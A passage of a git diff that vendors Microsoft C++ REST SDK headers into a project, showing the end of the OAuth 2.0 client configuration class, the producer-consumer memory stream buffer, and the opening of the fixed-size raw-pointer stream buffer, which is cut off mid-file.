set_bearer_auth() to control bearer token passing in either +/// query or header (default: header). See: http://tools.ietf.org/html/rfc6750#section-2 +/// - If needed, use set_access_token_key() to set "non-standard" access token +/// key (default: "access_token"). +/// - If needed, use set_implicit_grant() to enable implicit grant flow. +/// 2. Build authorization URI with build_authorization_uri() and open this in web browser/control. +/// 3. The resource owner should then clicks "Yes" to authorize your client/app, and +/// as a result the web browser/control is redirected to redirect_uri(). +/// 5. Capture the redirected URI either in web control or by HTTP listener. +/// 6. Pass the redirected URI to token_from_redirected_uri() to obtain access token. +/// - The method ensures redirected URI contains same state() as set in step 1. +/// - In implicit_grant() is false, this will create HTTP request to fetch access token +/// from the service. Otherwise access token is already included in the redirected URI. +/// +/// Usage for issuing authenticated requests: +/// 1. Perform authorization as above to obtain the access token or use an existing token. +/// - Some services provide option to generate access tokens for testing purposes. +/// 2. Pass the resulting oauth2_config with the access token to http_client_config::set_oauth2(). +/// 3. Construct http_client with this http_client_config. As a result, all HTTP requests +/// by that client will be OAuth 2.0 authenticated. +/// +/// +class oauth2_config +{ +public: + oauth2_config(utility::string_t client_key, + utility::string_t client_secret, + utility::string_t auth_endpoint, + utility::string_t token_endpoint, + utility::string_t redirect_uri, + utility::string_t scope = utility::string_t(), + utility::string_t user_agent = utility::string_t()) + : m_client_key(std::move(client_key)) + , m_client_secret(std::move(client_secret)) + , m_auth_endpoint(std::move(auth_endpoint)) + , m_token_endpoint(std::move(token_endpoint)) + , m_redirect_uri(std::move(redirect_uri)) + , m_scope(std::move(scope)) + , m_user_agent(std::move(user_agent)) + , m_implicit_grant(false) + , m_bearer_auth(true) + , m_http_basic_auth(true) + , m_access_token_key(details::oauth2_strings::access_token) + { + } + + /// + /// Builds an authorization URI to be loaded in the web browser/view. + /// The URI is built with auth_endpoint() as basis. + /// The implicit_grant() affects the built URI by selecting + /// either authorization code or implicit grant flow. + /// You can set generate_state to generate a new random state string. + /// + /// If true, a new random state() string is generated + /// which replaces the current state(). If false, state() is unchanged and used as-is. + /// Authorization URI string. + _ASYNCRTIMP utility::string_t build_authorization_uri(bool generate_state); + + /// + /// Fetch an access token (and possibly a refresh token) based on redirected URI. + /// Behavior depends on the implicit_grant() setting. + /// If implicit_grant() is false, the URI is parsed for 'code' + /// parameter, and then token_from_code() is called with this code. + /// See: http://tools.ietf.org/html/rfc6749#section-4.1 + /// Otherwise, redirect URI fragment part is parsed for 'access_token' + /// parameter, which directly contains the token(s). + /// See: http://tools.ietf.org/html/rfc6749#section-4.2 + /// In both cases, the 'state' parameter is parsed and is verified to match state(). + /// + /// The URI where web browser/view was redirected after resource owner's + /// authorization. Task that fetches the token(s) based on redirected URI. + _ASYNCRTIMP pplx::task token_from_redirected_uri(const web::http::uri& redirected_uri); + + /// + /// Fetches an access token (and possibly a refresh token) from the token endpoint. + /// The task creates an HTTP request to the token_endpoint() which exchanges + /// the authorization code for the token(s). + /// This also sets the refresh token if one was returned. + /// See: http://tools.ietf.org/html/rfc6749#section-4.1.3 + /// + /// Code received via redirect upon successful authorization. + /// Task that fetches token(s) based on the authorization code. + pplx::task token_from_code(utility::string_t authorization_code) + { + uri_builder ub; + ub.append_query(details::oauth2_strings::grant_type, details::oauth2_strings::authorization_code, false); + ub.append_query(details::oauth2_strings::code, uri::encode_data_string(std::move(authorization_code)), false); + ub.append_query(details::oauth2_strings::redirect_uri, uri::encode_data_string(redirect_uri()), false); + return _request_token(ub); + } + + /// + /// Fetches a new access token (and possibly a new refresh token) using the refresh token. + /// The task creates a HTTP request to the token_endpoint(). + /// If successful, resulting access token is set as active via set_token(). + /// See: http://tools.ietf.org/html/rfc6749#section-6 + /// This also sets a new refresh token if one was returned. + /// + /// Task that fetches the token(s) using the refresh token. + pplx::task token_from_refresh() + { + uri_builder ub; + ub.append_query(details::oauth2_strings::grant_type, details::oauth2_strings::refresh_token, false); + ub.append_query( + details::oauth2_strings::refresh_token, uri::encode_data_string(token().refresh_token()), false); + return _request_token(ub); + } + + /// + /// Returns enabled state of the configuration. + /// The oauth2_handler will perform OAuth 2.0 authentication only if + /// this method returns true. + /// Return value is true if access token is valid (=fetched or manually set). + /// + /// The configuration enabled state. + bool is_enabled() const { return token().is_valid_access_token(); } + + /// + /// Get client key. + /// + /// Client key string. + const utility::string_t& client_key() const { return m_client_key; } + /// + /// Set client key. + /// + /// Client key string to set. + void set_client_key(utility::string_t client_key) { m_client_key = std::move(client_key); } + + /// + /// Get client secret. + /// + /// Client secret string. + const utility::string_t& client_secret() const { return m_client_secret; } + /// + /// Set client secret. + /// + /// Client secret string to set. + void set_client_secret(utility::string_t client_secret) { m_client_secret = std::move(client_secret); } + + /// + /// Get authorization endpoint URI string. + /// + /// Authorization endpoint URI string. + const utility::string_t& auth_endpoint() const { return m_auth_endpoint; } + /// + /// Set authorization endpoint URI string. + /// + /// Authorization endpoint URI string to set. + void set_auth_endpoint(utility::string_t auth_endpoint) { m_auth_endpoint = std::move(auth_endpoint); } + + /// + /// Get token endpoint URI string. + /// + /// Token endpoint URI string. + const utility::string_t& token_endpoint() const { return m_token_endpoint; } + /// + /// Set token endpoint URI string. + /// + /// Token endpoint URI string to set. + void set_token_endpoint(utility::string_t token_endpoint) { m_token_endpoint = std::move(token_endpoint); } + + /// + /// Get redirect URI string. + /// + /// Redirect URI string. + const utility::string_t& redirect_uri() const { return m_redirect_uri; } + /// + /// Set redirect URI string. + /// + /// Redirect URI string to set. + void set_redirect_uri(utility::string_t redirect_uri) { m_redirect_uri = std::move(redirect_uri); } + + /// + /// Get scope used in authorization for token. + /// + /// Scope string used in authorization. + const utility::string_t& scope() const { return m_scope; } + /// + /// Set scope for authorization for token. + /// + /// Scope string for authorization for token. + void set_scope(utility::string_t scope) { m_scope = std::move(scope); } + + /// + /// Get client state string used in authorization. + /// + /// Client state string used in authorization. + const utility::string_t& state() { return m_state; } + /// + /// Set client state string for authorization for token. + /// The state string is used in authorization for security reasons + /// (to uniquely identify authorization sessions). + /// If desired, suitably secure state string can be automatically generated + /// by build_authorization_uri(). + /// A good state string consist of 30 or more random alphanumeric characters. + /// + /// Client authorization state string to set. + void set_state(utility::string_t state) { m_state = std::move(state); } + + /// + /// Get token. + /// + /// Token. + const oauth2_token& token() const { return m_token; } + /// + /// Set token. + /// + /// Token to set. + void set_token(oauth2_token token) { m_token = std::move(token); } + + /// + /// Get implicit grant setting for authorization. + /// + /// Implicit grant setting for authorization. + bool implicit_grant() const { return m_implicit_grant; } + /// + /// Set implicit grant setting for authorization. + /// False means authorization code grant is used for authorization. + /// True means implicit grant is used. + /// Default: False. + /// + /// The implicit grant setting to set. + void set_implicit_grant(bool implicit_grant) { m_implicit_grant = implicit_grant; } + + /// + /// Get bearer token authentication setting. + /// + /// Bearer token authentication setting. + bool bearer_auth() const { return m_bearer_auth; } + /// + /// Set bearer token authentication setting. + /// This must be selected based on what the service accepts. + /// True means access token is passed in the request header. (http://tools.ietf.org/html/rfc6750#section-2.1) + /// False means access token in passed in the query parameters. (http://tools.ietf.org/html/rfc6750#section-2.3) + /// Default: True. + /// + /// The bearer token authentication setting to set. + void set_bearer_auth(bool bearer_auth) { m_bearer_auth = bearer_auth; } + + /// + /// Get HTTP Basic authentication setting for token endpoint. + /// + /// HTTP Basic authentication setting for token endpoint. + bool http_basic_auth() const { return m_http_basic_auth; } + /// + /// Set HTTP Basic authentication setting for token endpoint. + /// This setting must be selected based on what the service accepts. + /// True means HTTP Basic authentication is used for the token endpoint. + /// False means client key & secret are passed in the HTTP request body. + /// Default: True. + /// + /// The HTTP Basic authentication setting to set. + void set_http_basic_auth(bool http_basic_auth) { m_http_basic_auth = http_basic_auth; } + + /// + /// Get access token key. + /// + /// Access token key string. + const utility::string_t& access_token_key() const { return m_access_token_key; } + /// + /// Set access token key. + /// If the service requires a "non-standard" key you must set it here. + /// Default: "access_token". + /// + void set_access_token_key(utility::string_t access_token_key) { m_access_token_key = std::move(access_token_key); } + + /// + /// Get the web proxy object + /// + /// A reference to the web proxy object. + const web_proxy& proxy() const { return m_proxy; } + + /// + /// Set the web proxy object that will be used by token_from_code and token_from_refresh + /// + /// A reference to the web proxy object. + void set_proxy(const web_proxy& proxy) { m_proxy = proxy; } + + /// + /// Get user agent to be used in oauth2 flows. + /// + /// User agent string. + const utility::string_t& user_agent() const { return m_user_agent; } + /// + /// Set user agent to be used in oauth2 flows. + /// If none is provided a default user agent is provided. + /// + void set_user_agent(utility::string_t user_agent) { m_user_agent = std::move(user_agent); } + +private: + friend class web::http::client::http_client_config; + friend class web::http::oauth2::details::oauth2_handler; + + oauth2_config() : m_implicit_grant(false), m_bearer_auth(true), m_http_basic_auth(true) {} + + _ASYNCRTIMP pplx::task _request_token(uri_builder& request_body); + + oauth2_token _parse_token_from_json(const json::value& token_json); + + void _authenticate_request(http_request& req) const + { + if (bearer_auth()) + { + req.headers().add(header_names::authorization, _XPLATSTR("Bearer ") + token().access_token()); + } + else + { + uri_builder ub(req.request_uri()); + ub.append_query(access_token_key(), token().access_token()); + req.set_request_uri(ub.to_uri()); + } + } + + utility::string_t m_client_key; + utility::string_t m_client_secret; + utility::string_t m_auth_endpoint; + utility::string_t m_token_endpoint; + utility::string_t m_redirect_uri; + utility::string_t m_scope; + utility::string_t m_state; + utility::string_t m_user_agent; + + web::web_proxy m_proxy; + + bool m_implicit_grant; + bool m_bearer_auth; + bool m_http_basic_auth; + utility::string_t m_access_token_key; + + oauth2_token m_token; + + utility::nonce_generator m_state_generator; +}; + +} // namespace experimental + +namespace details +{ +class oauth2_handler : public http_pipeline_stage +{ +public: + oauth2_handler(std::shared_ptr cfg) : m_config(std::move(cfg)) {} + + virtual pplx::task propagate(http_request request) override + { + if (m_config) + { + m_config->_authenticate_request(request); + } + return next_stage()->propagate(request); + } + +private: + std::shared_ptr m_config; +}; + +} // namespace details +} // namespace oauth2 +} // namespace http +} // namespace web + +#endif diff --git a/Src/Common/CppRestSdk/include/cpprest/producerconsumerstream.h b/Src/Common/CppRestSdk/include/cpprest/producerconsumerstream.h new file mode 100644 index 0000000..af96e83 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/producerconsumerstream.h @@ -0,0 +1,655 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * This file defines a basic memory-based stream buffer, which allows consumer / producer pairs to communicate + * data via a buffer. + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#ifndef CASA_PRODUCER_CONSUMER_STREAMS_H +#define CASA_PRODUCER_CONSUMER_STREAMS_H + +#include "Common/CppRestSdk/include/cpprest/astreambuf.h" +#include "Common/CppRestSdk/include/pplx/pplxtasks.h" +#include +#include +#include +#include + +namespace Concurrency +{ +namespace streams +{ +namespace details +{ +/// +/// The basic_producer_consumer_buffer class serves as a memory-based steam buffer that supports both writing and +/// reading sequences of characters. It can be used as a consumer/producer buffer. +/// +template +class basic_producer_consumer_buffer : public streams::details::streambuf_state_manager<_CharType> +{ +public: + typedef typename ::concurrency::streams::char_traits<_CharType> traits; + typedef typename basic_streambuf<_CharType>::int_type int_type; + typedef typename basic_streambuf<_CharType>::pos_type pos_type; + typedef typename basic_streambuf<_CharType>::off_type off_type; + + /// + /// Constructor + /// + basic_producer_consumer_buffer(size_t alloc_size) + : streambuf_state_manager<_CharType>(std::ios_base::out | std::ios_base::in) + , m_alloc_size(alloc_size) + , m_allocBlock(nullptr) + , m_total(0) + , m_total_read(0) + , m_total_written(0) + , m_synced(0) + { + } + + /// + /// Destructor + /// + virtual ~basic_producer_consumer_buffer() + { + // Note: there is no need to call 'wait()' on the result of close(), + // since we happen to know that close() will return without actually + // doing anything asynchronously. Should the implementation of _close_write() + // change in that regard, this logic may also have to change. + this->_close_read(); + this->_close_write(); + + _ASSERTE(m_requests.empty()); + m_blocks.clear(); + } + + /// + /// can_seek is used to determine whether a stream buffer supports seeking. + /// + virtual bool can_seek() const { return false; } + + /// + /// has_size is used to determine whether a stream buffer supports size(). + /// + virtual bool has_size() const { return false; } + + /// + /// Get the stream buffer size, if one has been set. + /// + /// The direction of buffering (in or out) + /// An implementation that does not support buffering will always return '0'. + virtual size_t buffer_size(std::ios_base::openmode = std::ios_base::in) const { return 0; } + + /// + /// Sets the stream buffer implementation to buffer or not buffer. + /// + /// The size to use for internal buffering, 0 if no buffering should be done. + /// The direction of buffering (in or out) + /// An implementation that does not support buffering will silently ignore calls to this function and it + /// will not have any effect on what is returned by subsequent calls to . + virtual void set_buffer_size(size_t, std::ios_base::openmode = std::ios_base::in) { return; } + + /// + /// For any input stream, in_avail returns the number of characters that are immediately available + /// to be consumed without blocking. May be used in conjunction with to read data without + /// incurring the overhead of using tasks. + /// + virtual size_t in_avail() const { return m_total; } + + /// + /// Gets the current read or write position in the stream. + /// + /// The I/O direction to seek (see remarks) + /// The current position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. + /// For such streams, the direction parameter defines whether to move the read or the write + /// cursor. + virtual pos_type getpos(std::ios_base::openmode mode) const + { + if (((mode & std::ios_base::in) && !this->can_read()) || ((mode & std::ios_base::out) && !this->can_write())) + return static_cast(traits::eof()); + + if (mode == std::ios_base::in) + return (pos_type)m_total_read; + else if (mode == std::ios_base::out) + return (pos_type)m_total_written; + else + return (pos_type)traits::eof(); + } + + // Seeking is not supported + virtual pos_type seekpos(pos_type, std::ios_base::openmode) { return (pos_type)traits::eof(); } + virtual pos_type seekoff(off_type, std::ios_base::seekdir, std::ios_base::openmode) + { + return (pos_type)traits::eof(); + } + + /// + /// Allocates a contiguous memory block and returns it. + /// + /// The number of characters to allocate. + /// A pointer to a block to write to, null if the stream buffer implementation does not support + /// alloc/commit. + virtual _CharType* _alloc(size_t count) + { + if (!this->can_write()) + { + return nullptr; + } + + // We always allocate a new block even if the count could be satisfied by + // the current write block. While this does lead to wasted space it allows for + // easier book keeping + + _ASSERTE(!m_allocBlock); + m_allocBlock = std::make_shared<_block>(count); + return m_allocBlock->wbegin(); + } + + /// + /// Submits a block already allocated by the stream buffer. + /// + /// The number of characters to be committed. + virtual void _commit(size_t count) + { + pplx::extensibility::scoped_critical_section_t l(m_lock); + + // The count does not reflect the actual size of the block. + // Since we do not allow any more writes to this block it would suffice. + // If we ever change the algorithm to reuse blocks then this needs to be revisited. + + _ASSERTE((bool)m_allocBlock); + m_allocBlock->update_write_head(count); + m_blocks.push_back(m_allocBlock); + m_allocBlock = nullptr; + + update_write_head(count); + } + + /// + /// Gets a pointer to the next already allocated contiguous block of data. + /// + /// A reference to a pointer variable that will hold the address of the block on success. + /// The number of contiguous characters available at the address in 'ptr'. + /// true if the operation succeeded, false otherwise. + /// + /// A return of false does not necessarily indicate that a subsequent read operation would fail, only that + /// there is no block to return immediately or that the stream buffer does not support the operation. + /// The stream buffer may not de-allocate the block until is called. + /// If the end of the stream is reached, the function will return true, a null pointer, and a count of zero; + /// a subsequent read will not succeed. + /// + virtual bool acquire(_Out_ _CharType*& ptr, _Out_ size_t& count) + { + count = 0; + ptr = nullptr; + + if (!this->can_read()) return false; + + pplx::extensibility::scoped_critical_section_t l(m_lock); + + if (m_blocks.empty()) + { + // If the write head has been closed then have reached the end of the + // stream (return true), otherwise more data could be written later (return false). + return !this->can_write(); + } + else + { + auto block = m_blocks.front(); + + count = block->rd_chars_left(); + ptr = block->rbegin(); + + _ASSERTE(ptr != nullptr); + return true; + } + } + + /// + /// Releases a block of data acquired using . This frees the stream buffer to + /// de-allocate the memory, if it so desires. Move the read position ahead by the count. + /// + /// A pointer to the block of data to be released. + /// The number of characters that were read. + virtual void release(_Out_writes_opt_(count) _CharType* ptr, _In_ size_t count) + { + if (ptr == nullptr) return; + + pplx::extensibility::scoped_critical_section_t l(m_lock); + auto block = m_blocks.front(); + + _ASSERTE(block->rd_chars_left() >= count); + block->m_read += count; + + update_read_head(count); + } + +protected: + virtual pplx::task _sync() + { + pplx::extensibility::scoped_critical_section_t l(m_lock); + + m_synced = in_avail(); + + fulfill_outstanding(); + + return pplx::task_from_result(true); + } + + virtual pplx::task _putc(_CharType ch) + { + return pplx::task_from_result((this->write(&ch, 1) == 1) ? static_cast(ch) : traits::eof()); + } + + virtual pplx::task _putn(const _CharType* ptr, size_t count) + { + return pplx::task_from_result(this->write(ptr, count)); + } + + virtual pplx::task _getn(_Out_writes_(count) _CharType* ptr, _In_ size_t count) + { + pplx::task_completion_event tce; + enqueue_request(_request(count, [this, ptr, count, tce]() { + // VS 2010 resolves read to a global function. Explicit + // invocation through the "this" pointer fixes the issue. + tce.set(this->read(ptr, count)); + })); + return pplx::create_task(tce); + } + + virtual size_t _sgetn(_Out_writes_(count) _CharType* ptr, _In_ size_t count) + { + pplx::extensibility::scoped_critical_section_t l(m_lock); + return can_satisfy(count) ? this->read(ptr, count) : (size_t)traits::requires_async(); + } + + virtual size_t _scopy(_Out_writes_(count) _CharType* ptr, _In_ size_t count) + { + pplx::extensibility::scoped_critical_section_t l(m_lock); + return can_satisfy(count) ? this->read(ptr, count, false) : (size_t)traits::requires_async(); + } + + virtual pplx::task _bumpc() + { + pplx::task_completion_event tce; + enqueue_request(_request(1, [this, tce]() { tce.set(this->read_byte(true)); })); + return pplx::create_task(tce); + } + + virtual int_type _sbumpc() + { + pplx::extensibility::scoped_critical_section_t l(m_lock); + return can_satisfy(1) ? this->read_byte(true) : traits::requires_async(); + } + + virtual pplx::task _getc() + { + pplx::task_completion_event tce; + enqueue_request(_request(1, [this, tce]() { tce.set(this->read_byte(false)); })); + return pplx::create_task(tce); + } + + int_type _sgetc() + { + pplx::extensibility::scoped_critical_section_t l(m_lock); + return can_satisfy(1) ? this->read_byte(false) : traits::requires_async(); + } + + virtual pplx::task _nextc() + { + pplx::task_completion_event tce; + enqueue_request(_request(1, [this, tce]() { + this->read_byte(true); + tce.set(this->read_byte(false)); + })); + return pplx::create_task(tce); + } + + virtual pplx::task _ungetc() { return pplx::task_from_result(traits::eof()); } + +private: + /// + /// Close the stream buffer for writing + /// + pplx::task _close_write() + { + // First indicate that there could be no more writes. + // Fulfill outstanding relies on that to flush all the + // read requests. + this->m_stream_can_write = false; + + { + pplx::extensibility::scoped_critical_section_t l(this->m_lock); + + // This runs on the thread that called close. + this->fulfill_outstanding(); + } + + return pplx::task_from_result(); + } + + /// + /// Updates the write head by an offset specified by count + /// + /// This should be called with the lock held + void update_write_head(size_t count) + { + m_total += count; + m_total_written += count; + fulfill_outstanding(); + } + + /// + /// Writes count characters from ptr into the stream buffer + /// + size_t write(const _CharType* ptr, size_t count) + { + if (!this->can_write() || (count == 0)) return 0; + + // If no one is going to read, why bother? + // Just pretend to be writing! + if (!this->can_read()) return count; + + pplx::extensibility::scoped_critical_section_t l(m_lock); + + // Allocate a new block if necessary + if (m_blocks.empty() || m_blocks.back()->wr_chars_left() < count) + { + msl::safeint3::SafeInt alloc = m_alloc_size.Max(count); + m_blocks.push_back(std::make_shared<_block>(alloc)); + } + + // The block at the back is always the write head + auto last = m_blocks.back(); + auto countWritten = last->write(ptr, count); + _ASSERTE(countWritten == count); + + update_write_head(countWritten); + return countWritten; + } + + /// + /// Fulfill pending requests + /// + /// This should be called with the lock held + void fulfill_outstanding() + { + while (!m_requests.empty()) + { + auto req = m_requests.front(); + + // If we cannot satisfy the request then we need + // to wait for the producer to write data + if (!can_satisfy(req.size())) return; + + // We have enough data to satisfy this request + req.complete(); + + // Remove it from the request queue + m_requests.pop(); + } + } + + /// + /// Represents a memory block + /// + class _block + { + public: + _block(size_t size) : m_read(0), m_pos(0), m_size(size), m_data(new _CharType[size]) {} + + ~_block() { delete[] m_data; } + + // Read head + size_t m_read; + + // Write head + size_t m_pos; + + // Allocation size (of m_data) + size_t m_size; + + // The data store + _CharType* m_data; + + // Pointer to the read head + _CharType* rbegin() { return m_data + m_read; } + + // Pointer to the write head + _CharType* wbegin() { return m_data + m_pos; } + + // Read up to count characters from the block + size_t read(_Out_writes_(count) _CharType* dest, _In_ size_t count, bool advance = true) + { + msl::safeint3::SafeInt avail(rd_chars_left()); + auto countRead = static_cast(avail.Min(count)); + + _CharType* beg = rbegin(); + _CharType* end = rbegin() + countRead; + +#if defined(_ITERATOR_DEBUG_LEVEL) && _ITERATOR_DEBUG_LEVEL != 0 + // Avoid warning C4996: Use checked iterators under SECURE_SCL + std::copy(beg, end, stdext::checked_array_iterator<_CharType*>(dest, count)); +#else + std::copy(beg, end, dest); +#endif // _WIN32 + + if (advance) + { + m_read += countRead; + } + + return countRead; + } + + // Write count characters into the block + size_t write(const _CharType* src, size_t count) + { + msl::safeint3::SafeInt avail(wr_chars_left()); + auto countWritten = static_cast(avail.Min(count)); + + const _CharType* srcEnd = src + countWritten; + +#if defined(_ITERATOR_DEBUG_LEVEL) && _ITERATOR_DEBUG_LEVEL != 0 + // Avoid warning C4996: Use checked iterators under SECURE_SCL + std::copy(src, srcEnd, stdext::checked_array_iterator<_CharType*>(wbegin(), static_cast(avail))); +#else + std::copy(src, srcEnd, wbegin()); +#endif // _WIN32 + + update_write_head(countWritten); + return countWritten; + } + + void update_write_head(size_t count) { m_pos += count; } + + size_t rd_chars_left() const { return m_pos - m_read; } + size_t wr_chars_left() const { return m_size - m_pos; } + + private: + // Copy is not supported + _block(const _block&); + _block& operator=(const _block&); + }; + + /// + /// Represents a request on the stream buffer - typically reads + /// + class _request + { + public: + typedef std::function func_type; + _request(size_t count, const func_type& func) : m_func(func), m_count(count) {} + + void complete() { m_func(); } + + size_t size() const { return m_count; } + + private: + func_type m_func; + size_t m_count; + }; + + void enqueue_request(_request req) + { + pplx::extensibility::scoped_critical_section_t l(m_lock); + + if (can_satisfy(req.size())) + { + // We can immediately fulfill the request. + req.complete(); + } + else + { + // We must wait for data to arrive. + m_requests.push(req); + } + } + + /// + /// Determine if the request can be satisfied. + /// + bool can_satisfy(size_t count) { return (m_synced > 0) || (this->in_avail() >= count) || !this->can_write(); } + + /// + /// Reads a byte from the stream and returns it as int_type. + /// Note: This routine shall only be called if can_satisfy() returned true. + /// + /// This should be called with the lock held + int_type read_byte(bool advance = true) + { + _CharType value; + auto read_size = this->read(&value, 1, advance); + return read_size == 1 ? static_cast(value) : traits::eof(); + } + + /// + /// Reads up to count characters into ptr and returns the count of characters copied. + /// The return value (actual characters copied) could be <= count. + /// Note: This routine shall only be called if can_satisfy() returned true. + /// + /// This should be called with the lock held + size_t read(_Out_writes_(count) _CharType* ptr, _In_ size_t count, bool advance = true) + { + _ASSERTE(can_satisfy(count)); + + size_t read = 0; + + for (auto iter = begin(m_blocks); iter != std::end(m_blocks); ++iter) + { + auto block = *iter; + auto read_from_block = block->read(ptr + read, count - read, advance); + + read += read_from_block; + + _ASSERTE(count >= read); + if (read == count) break; + } + + if (advance) + { + update_read_head(read); + } + + return read; + } + + /// + /// Updates the read head by the specified offset + /// + /// This should be called with the lock held + void update_read_head(size_t count) + { + m_total -= count; + m_total_read += count; + + if (m_synced > 0) m_synced = (m_synced > count) ? (m_synced - count) : 0; + + // The block at the front is always the read head. + // Purge empty blocks so that the block at the front reflects the read head + while (!m_blocks.empty()) + { + // If front block is not empty - we are done + if (m_blocks.front()->rd_chars_left() > 0) break; + + // The block has no more data to be read. Relase the block + m_blocks.pop_front(); + } + } + + // The in/out mode for the buffer + std::ios_base::openmode m_mode; + + // Default block size + msl::safeint3::SafeInt m_alloc_size; + + // Block used for alloc/commit + std::shared_ptr<_block> m_allocBlock; + + // Total available data + size_t m_total; + + size_t m_total_read; + size_t m_total_written; + + // Keeps track of the number of chars that have been flushed but still + // remain to be consumed by a read operation. + size_t m_synced; + + // The producer-consumer buffer is intended to be used concurrently by a reader + // and a writer, who are not coordinating their accesses to the buffer (coordination + // being what the buffer is for in the first place). Thus, we have to protect + // against some of the internal data elements against concurrent accesses + // and the possibility of inconsistent states. A simple non-recursive lock + // should be sufficient for those purposes. + pplx::extensibility::critical_section_t m_lock; + + // Memory blocks + std::deque> m_blocks; + + // Queue of requests + std::queue<_request> m_requests; +}; + +} // namespace details + +/// +/// The producer_consumer_buffer class serves as a memory-based steam buffer that supports both writing and reading +/// sequences of bytes. It can be used as a consumer/producer buffer. +/// +/// +/// The data type of the basic element of the producer_consumer_buffer. +/// +/// +/// This is a reference-counted version of basic_producer_consumer_buffer. +template +class producer_consumer_buffer : public streambuf<_CharType> +{ +public: + typedef _CharType char_type; + + /// + /// Create a producer_consumer_buffer. + /// + /// The internal default block size. + producer_consumer_buffer(size_t alloc_size = 512) + : streambuf<_CharType>(std::make_shared>(alloc_size)) + { + } +}; + +} // namespace streams +} // namespace Concurrency + +#endif diff --git a/Src/Common/CppRestSdk/include/cpprest/rawptrstream.h b/Src/Common/CppRestSdk/include/cpprest/rawptrstream.h new file mode 100644 index 0000000..4bd33ae --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/rawptrstream.h @@ -0,0 +1,598 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * This file defines a stream buffer that is based on a raw pointer and block size. Unlike a vector-based + * stream buffer, the buffer cannot be expanded or contracted, it has a fixed capacity. + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#ifndef CASA_RAWPTR_STREAMS_H +#define CASA_RAWPTR_STREAMS_H + +#include "Common/CppRestSdk/include/cpprest/astreambuf.h" +#include "Common/CppRestSdk/include/cpprest/streams.h" +#include "Common/CppRestSdk/include/pplx/pplxtasks.h" +#include +#include +#include +#include + +namespace Concurrency +{ +namespace streams +{ +// Forward declarations +template +class rawptr_buffer; + +namespace details +{ +/// +/// The basic_rawptr_buffer class serves as a memory-based steam buffer that supports both writing and reading +/// sequences of characters to and from a fixed-size block. +/// +template +class basic_rawptr_buffer : public streams::details::streambuf_state_manager<_CharType> +{ +public: + typedef _CharType char_type; + + typedef typename basic_streambuf<_CharType>::traits traits; + typedef typename basic_streambuf<_CharType>::int_type int_type; + typedef typename basic_streambuf<_CharType>::pos_type pos_type; + typedef typename basic_streambuf<_CharType>::off_type off_type; + + /// + /// Constructor + /// + basic_rawptr_buffer() + : streambuf_state_manager<_CharType>(std::ios_base::in | std::ios_base::out) + , m_data(nullptr) + , m_current_position(0) + , m_size(0) + { + } + + /// + /// Destructor + /// + virtual ~basic_rawptr_buffer() + { + this->_close_read(); + this->_close_write(); + } + +protected: + /// + /// can_seek is used to determine whether a stream buffer supports seeking. + /// + virtual bool can_seek() const { return this->is_open(); } + + /// + /// has_size is used to determine whether a stream buffer supports size(). + /// + virtual bool has_size() const { return this->is_open(); } + + /// + /// Gets the size of the stream, if known. Calls to has_size will determine whether + /// the result of size can be relied on. + /// + virtual utility::size64_t size() const { return utility::size64_t(m_size); } + + /// + /// Get the stream buffer size, if one has been set. + /// + /// The direction of buffering (in or out) + /// An implementation that does not support buffering will always return '0'. + virtual size_t buffer_size(std::ios_base::openmode = std::ios_base::in) const { return 0; } + + /// + /// Set the stream buffer implementation to buffer or not buffer. + /// + /// The size to use for internal buffering, 0 if no buffering should be done. + /// The direction of buffering (in or out) + /// An implementation that does not support buffering will silently ignore calls to this function and it + /// will not have + /// any effect on what is returned by subsequent calls to buffer_size(). + virtual void set_buffer_size(size_t, std::ios_base::openmode = std::ios_base::in) { return; } + + /// + /// For any input stream, in_avail returns the number of characters that are immediately available + /// to be consumed without blocking. May be used in conjunction with and sgetn() to + /// read data without incurring the overhead of using tasks. + /// + virtual size_t in_avail() const + { + // See the comment in seek around the restiction that we do not allow read head to + // seek beyond the current size. + _ASSERTE(m_current_position <= m_size); + + msl::safeint3::SafeInt readhead(m_current_position); + msl::safeint3::SafeInt writeend(m_size); + return (size_t)(writeend - readhead); + } + + /// + /// Closes the stream buffer, preventing further read or write operations. + /// + /// The I/O mode (in or out) to close for. + virtual pplx::task close(std::ios_base::openmode mode) + { + if (mode & std::ios_base::in) + { + this->_close_read().get(); // Safe to call get() here. + } + + if (mode & std::ios_base::out) + { + this->_close_write().get(); // Safe to call get() here. + } + + if (!this->can_read() && !this->can_write()) + { + m_data = nullptr; + } + + // Exceptions will be propagated out of _close_read or _close_write + return pplx::task_from_result(); + } + + virtual pplx::task _sync() { return pplx::task_from_result(true); } + + virtual pplx::task _putc(_CharType ch) + { + if (m_current_position >= m_size) return pplx::task_from_result(traits::eof()); + int_type retVal = (this->write(&ch, 1) == 1) ? static_cast(ch) : traits::eof(); + return pplx::task_from_result(retVal); + } + + virtual pplx::task _putn(const _CharType* ptr, size_t count) + { + msl::safeint3::SafeInt newSize = msl::safeint3::SafeInt(count) + m_current_position; + if (newSize > m_size) + return pplx::task_from_exception( + std::make_exception_ptr(std::runtime_error("Writing past the end of the buffer"))); + return pplx::task_from_result(this->write(ptr, count)); + } + + /// + /// Allocates a contiguous memory block and returns it. + /// + /// The number of characters to allocate. + /// A pointer to a block to write to, null if the stream buffer implementation does not support + /// alloc/commit. + 